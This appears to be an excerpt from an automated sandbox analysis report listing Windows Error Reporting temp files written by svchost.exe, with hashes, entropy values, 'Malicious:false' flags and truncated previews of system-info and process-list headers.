                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER625F.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6858654210178634
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWzs8gKs0YrYQWRHXgYEZ91tFir7e/WwWBJJva71a5dCYMuM7I4B3:2ZDrMII6B3vKa5dNMuM04B3
                                                                                                                                                                    MD5:0C1C1287E3E3C8E74CDCBFEF156FA63F
                                                                                                                                                                    SHA1:A837B629CD70281F51EA9DFF6419F3E15F916844
                                                                                                                                                                    SHA-256:092170A96C5C3AA7A6488E2AC0C0D0A01EB97D1F20E2BB0D617CF01AF0C08EBB
                                                                                                                                                                    SHA-512:16FD9F120D157F9D70CED783C948460BE1460129D334E8CAB2CC3C7800A2DFD2013DB638D1C47FE4EBBFD3687B86014A856FA9ADC63F425C46A61C3F32680CCF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6577.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):91762
                                                                                                                                                                    Entropy (8bit):3.052911024593213
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:6mWdGCYkyW60DCzRUng0hNKHKHVv0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+HK:6mWdGCYkyW60DCzRUng0hNKHK1v0n+sZ
                                                                                                                                                                    MD5:10864EA43C8B89783824DC748E98C25B
                                                                                                                                                                    SHA1:8933A6B0A079944682B98A20B6E8554923F0BFAC
                                                                                                                                                                    SHA-256:87F80F3E047114705C871AF2DBB9F82B698D725530B6B9480D1FB34AB8D9CDA4
                                                                                                                                                                    SHA-512:87D9D9D18523178CD70072177601088BAF4B70DFB668405945652BB3FD74A107CA3ABBF4355B8DED5A7635B0780D05978D556A2680BB2ED5E646EC27EF2AADE6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6653.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.7013411561238727
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWE18QUYJMYqkXHkiYEZ6ctFiG7+Fgwp3HaaHLh52MmQkGI9x+20:2ZDj13N3aaHyMPkBj+20
                                                                                                                                                                    MD5:AEF18AFEDC4C5FEDA3710C33F0F678AD
                                                                                                                                                                    SHA1:C2D010AD60708E14D3CCFB6B88359AC5084C3FD1
                                                                                                                                                                    SHA-256:AF719E55F489BF8F21CAC8761EBD839700898E8E4D9C227BDFE0B44E88D0D68E
                                                                                                                                                                    SHA-512:269D29CB32031D95A69F1FA362DD30C538CE30BCE961254ED6DB0224AA8DA67EE32C01195F95F28FC5CC9AD9A350B9B4BA3B22D090E40306B00D75F77107620B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER66E4.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):89254
                                                                                                                                                                    Entropy (8bit):3.056692647882618
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:yWf99i4dERhrAIPUQsf6b8Ziz20n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+mn:yWf99i4dERhrAIPUQsf6b8ZA20n+sI+y
                                                                                                                                                                    MD5:45CB0504E066291A048AFD3712F90A45
                                                                                                                                                                    SHA1:FCECE70CF05D3AA6603E0A4E3417059905AE6287
                                                                                                                                                                    SHA-256:4B8B95ED295A57D263DC2F4A2BF922B642631E35F0BB8689D58C23142D1EABFA
                                                                                                                                                                    SHA-512:8E14FAB7124D852F4B669F4D68B564B83C04C70674DE0D2E067760FE53359A9E04277256EDDF5A4F2C5FD17D148F585D47CE8AB5538EAB2E995EC12DECDA753D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A7F.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6864207775631876
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWwJ7tTLYgYbWPxdMHeQYEZQftFip7Ic/uxwxr2gaZdFUMPMLIqB3:2ZDMhHBHVQVaZduMPMEqB3
                                                                                                                                                                    MD5:E4E079C3133A3CC7E613440DC50F4C0D
                                                                                                                                                                    SHA1:A6A6EB70006291A96285B6726B5E44577CC49F73
                                                                                                                                                                    SHA-256:CBA471BD322BF4512EB778DA5EA3CD552591B4548B8EC3967DC8AE5FCD36D494
                                                                                                                                                                    SHA-512:D7AC68A446A0930B15AE9F9E0DC2E2C10AF64818FCF8616CF367F6FA1275A6A2C0430E48A8D1575F0E2D738596B807A6D58FA42110624DFFB272C97B0A2651B4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FC0.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):89304
                                                                                                                                                                    Entropy (8bit):3.056695606001381
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:5X+As4dqRhrAeZUQsk6bxZig20n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+o:5X+As4dqRhrAeZUQsk6bxZj20n+sI+E7
                                                                                                                                                                    MD5:D2EE7EF0C5E206815A78A9C16AD54418
                                                                                                                                                                    SHA1:621A50BC2A3B00E03A92B71EBCAC141512D57C20
                                                                                                                                                                    SHA-256:3B6C166431B5B1563EC154A68D299F333F2C751DF5690FCD22160115E54B53C9
                                                                                                                                                                    SHA-512:114169D631D4FBDAC600D6F3023A0AA8DA6B65D47D25A7E19864D6CD748C08941110922A5E757AD78F4951CBCDB002FA3FCF26DB47A3E521AF13E76D36744A3F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER733B.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6864611130183786
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWD2zgb6YwYgMkW5HmYEZu2cLtFiU7k/FjwulgVTcgardfMxh1I/RB3:2ZD+pH+HeebardfMxhKJB3
                                                                                                                                                                    MD5:73E459CFE9FA4E6C28805BA4399AE23F
                                                                                                                                                                    SHA1:D96725BA953B7F0C558704F9BDE761C91DEB6EFF
                                                                                                                                                                    SHA-256:E2ECFF66C4F8A75EB4CAB63CF659E55745C586D6A752DD869A37BE08C4921211
                                                                                                                                                                    SHA-512:DF8F230D03AE8D0CA116576EA82F8BB7A4AE1561412B8EF1384A30C069953CF0918BF4BB1697053229641B25BA94665C60C7C77A0D6E1B13A13F5E35B18DE6CE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER7715.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):89742
                                                                                                                                                                    Entropy (8bit):3.0560207887240596
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:M00EgDd4NrAe4UQsV6BwZiU20n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+kF:M00EgDd4NrAe4UQsV6BwZX20n+sI+E+c
                                                                                                                                                                    MD5:12B91FFB2757EF222CDBF34A5F4599F5
                                                                                                                                                                    SHA1:5F13AB10FA7EE0B45DDD77F32E315A9040161499
                                                                                                                                                                    SHA-256:64EE0F208D54D6CABBD920B00FAE5E650B0B539DE91584E647BBB550DFF46034
                                                                                                                                                                    SHA-512:1A62C270E34D8E5D794B3CF5A0B5988D1F5F87B27C0CD584F67A77F2BDCDA8CC24CAB82C37BA4894A22C8CA7272281C4E0B16465A30098E45E2EFA02065955C5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER78DB.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6862971261055866
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYW6qWlMuiY3YgUWkHmYEZhXtFi47P/+wUdAvlaIDFMGeqIVC3:2ZDewQV8CaIDFMGedVC3
                                                                                                                                                                    MD5:BE90F4A079CA4EE60DCA16DC27E52144
                                                                                                                                                                    SHA1:E2F195D48A8EC1FD2BBEBBE0C672A088E23CA9AD
                                                                                                                                                                    SHA-256:FB06B8AF4BC6A1639028B9A61BB29F64F7DCD0D98B7CE17B27CDA30DDEA535F6
                                                                                                                                                                    SHA-512:3646486995579389AA2C5931FCD6D858FFC8DEF2ECF8CEF7DEBCEFD7947476526AAF5E73D303D1E20752AB262EF74F732C0D61C72819B060AED1879CDFF4F822
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C9B.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):91776
                                                                                                                                                                    Entropy (8bit):3.052989965908164
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:VhaNrrRkVC60D8ztUnK0cvPFHKHQl0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+B:VhaNrrRkVC60D8ztUnK0cvPFHKwl0n+/
                                                                                                                                                                    MD5:045557DF14F5CB384C81C4BC6C38F60D
                                                                                                                                                                    SHA1:ED67D1BA99E0036C5EC5FEAA4030F013EDCE92B0
                                                                                                                                                                    SHA-256:ECC3A48BC491B39D643A2BD0CA41627BE6B60D347E87F39BCE1EEB4D602153A0
                                                                                                                                                                    SHA-512:D0A6147F4BDC36BEE883E0ED169BADFBB79D477B3619624C0C89A96B35733D24C35480A279E7F3E836E73EA0124D5F5C6F77648C43C498464E8AD2FFDCC4496A
                                                                                                                                                                    Malicious:false
